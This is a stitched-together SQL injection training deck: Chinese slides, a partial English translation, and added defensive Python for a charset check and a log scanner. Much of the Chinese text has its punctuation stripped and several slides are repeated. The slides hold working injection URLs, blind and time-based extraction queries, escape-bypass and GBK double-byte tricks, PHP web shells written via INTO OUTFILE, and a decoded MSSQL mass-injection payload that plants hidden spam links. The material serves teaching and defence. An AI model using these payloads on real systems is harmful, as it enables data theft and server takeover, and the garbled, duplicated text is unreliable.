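def is_well_formed(data: bytes, charset: str) -> bool:
    """Defender-side check: accept only input that decodes strictly in the
    connection charset. 0xBF followed by 0x27 is not valid GBK (trail bytes
    start at 0x40), so it is rejected before any escaping can 'repair' it."""
    try:
        data.decode(charset)
    except UnicodeDecodeError:
        return False
    return True


def safe_build_query(name: bytes, charset: str) -> bytes:
    """Validate the input in the connection charset, then escape and build.
    (The defence slide's primary fix is a prepared statement over a UTF-8
    connection; this check only closes the charset/escaper mismatch.)"""
    if not is_well_formed(name, charset):
        raise ValueError("input is not valid %s; refusing to build the query" % charset)
    return build_query(name)


if __name__ == "__main__":
    # Constructed sample in the style of the slide's `name=h%BF'...` request.
    tainted = bytes([0x68, 0xBF, 0x27]) + b" AND 1=2 UNION SELECT 1,2,3,4#"
    query = build_query(tainted)
    print(query.decode("gbk", errors="replace"))
    print("literal broken under gbk  :", literal_is_broken(query, "gbk"))    # True
    print("literal broken under utf-8:", literal_is_broken(query, "utf-8"))  # False
    print("input well-formed as gbk  :", is_well_formed(tainted, "gbk"))      # False
```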
SQL Column Truncation – Introduction (1/3)
• MySQL SQL mode
  – STRICT_ALL_TABLES not enabled
    • Inserting data longer than the column produces a warning
    • but the row is still inserted
  – STRICT_ALL_TABLES enabled
    • Inserting data longer than the column produces an error message
    • ERROR 1406 is raised and the row is not inserted
• The incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - Effect (2/3)
SQL Column Truncation - Defences (3/3)
• Actively strip whitespace from strings that should never contain it
  – e.g. account names and similar identifiers
• Add the BINARY keyword when SELECTing the data
• Configure MySQL to compare as BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – Values exceeding the column length raise an ERROR instead of a WARNING
  – To avoid errors on insert, extra checks may be needed in the insert/update code
SQL Injection – Further thoughts
• Can INSERT and UPDATE statements be attacked too?
• NoSQL: no SQL Injection?
• Other exploitation avenues
  – Deep Blind Injection
  – Error-Based Injection
    • Duplicate Error
    • Function
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection – Automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid Big5 or GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use safe library functions
  – OWASP ESAPI
    • MySQLCodec
MSSQL real-world case - 116jurist.ru automated injection (1/4)
• 2012/12/xx 10:03:31
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x[hex payload omitted; decoded on slide 4/4]+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (2/4)
• 2012/12/xx 10:03:33
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x[hex payload omitted; decoded on slide 4/4]+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection (3/4)
• 2012/12/xx 10:03:44
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x[hex payload omitted; decoded on slide 4/4]+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
  like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
  @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET
  ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM
  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
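As an added example (not code from the slides or from the case study), a scanner a defender could run over web-server access logs to pick out the request patterns shown throughout this deck (UNION SELECT, BENCHMARK/SLEEP, LOAD_FILE, INTO OUTFILE, CHAR() and 0x literals, comment terminators) and to decode the `cast(0x... as varchar(8000)) exec(@s)` wrapper seen in the 116jurist.ru case so the hidden T-SQL can be read. The combined-log format, the function names and every log line below are assumptions constructed for the example.

```python
# Added example (not code from the original slides or the case study): a small
# access-log scanner for the request patterns demonstrated in this deck. The
# combined log format, field positions and all log lines are constructed.
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Request target inside a combined-format access log line (assumed format).
_REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Case-insensitive indicators drawn from the techniques on the slides.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),
    "comment_tail": re.compile(r"(?:--|#|/\*)\s*$"),
}
# MSSQL wrapper from the case study: cast(0xHEX as varchar(n)) exec(...)
_MSSQL_HEX_EXEC = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+(?:n?var)?char\s*\(\s*\d+\s*\)\s*\)\s*exec\s*\(",
    re.I,
)


def decode_request(line: str) -> str:
    """Return the URL-decoded request target of one log line ('' if none)."""
    m = _REQUEST.search(line)
    return unquote_plus(m.group(1)) if m else ""


def decode_hex_wrapper(decoded: str) -> Optional[str]:
    """If the request carries the cast(0x...)/exec wrapper, return the T-SQL it hides."""
    m = _MSSQL_HEX_EXEC.search(decoded)
    if not m:
        return None
    try:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    except ValueError:  # odd-length hex: leave it to the analyst
        return None


def scan_query(decoded: str) -> Dict[str, object]:
    """Match every indicator against one decoded request."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    hidden = decode_hex_wrapper(decoded)
    if hidden is not None:
        hits.append("mssql_hex_exec")
    return {"indicators": hits, "hidden_sql": hidden}


def scan_log(lines: List[str]) -> List[Tuple[str, Dict[str, object]]]:
    """Return (line, findings) for every line with at least one indicator."""
    out = []
    for line in lines:
        findings = scan_query(decode_request(line))
        if findings["indicators"]:
            out.append((line, findings))
    return out


# Constructed sample: a harmless statement stands in for the real hex body.
SAMPLE_TSQL = "select 1 -- constructed sample"
SAMPLE_HEX = "0x" + SAMPLE_TSQL.encode("ascii").hex()

SAMPLE_LOG = [
    # benign request
    '203.0.113.7 - - [07/Mar/2013:10:03:20 +0800] "GET /getUser.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # UNION probe (the "UNION" slide)
    '203.0.113.7 - - [07/Mar/2013:10:03:25 +0800] "GET /getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    # time-based blind probe (the BENCHMARK slide)
    '203.0.113.7 - - [07/Mar/2013:10:03:29 +0800] "GET /getUserLash.php?id=1+UNION+SELECT+IF(SUBSTRING(db,1,1)=CHAR(104),BENCHMARK(5000000,ENCODE(%27ENCODE%27,%275s%27)),NULL),2,3,4+FROM+(SELECT+DATABASE()+as+db)+AS+tb HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    # hex-encoded file read with a comment terminator (the "bypass escaping" slide)
    '203.0.113.7 - - [07/Mar/2013:10:03:33 +0800] "GET /getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C636F6E6669672E706870)-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    # MSSQL wrapper in the style of the case study, with the constructed hex body
    '198.51.100.9 - - [07/Mar/2013:10:03:44 +0800] "GET /product.asp?Serno=51+declare+@s+varchar(8000)+set+@s=cast(' + SAMPLE_HEX + '+as+varchar(8000))+exec(@s)-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, findings in scan_log(SAMPLE_LOG):
        print(decode_request(line))
        print("  indicators:", ", ".join(findings["indicators"]))
        if findings["hidden_sql"]:
            print("  hidden T-SQL:", findings["hidden_sql"])
```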
References
• 吳翰清, 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL String Functions (5.1)
• MySQL Miscellaneous Functions (5.1)
• MySQL/PHP: generating a one-line shell with load_file/outfile when single quotes are escaped (MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
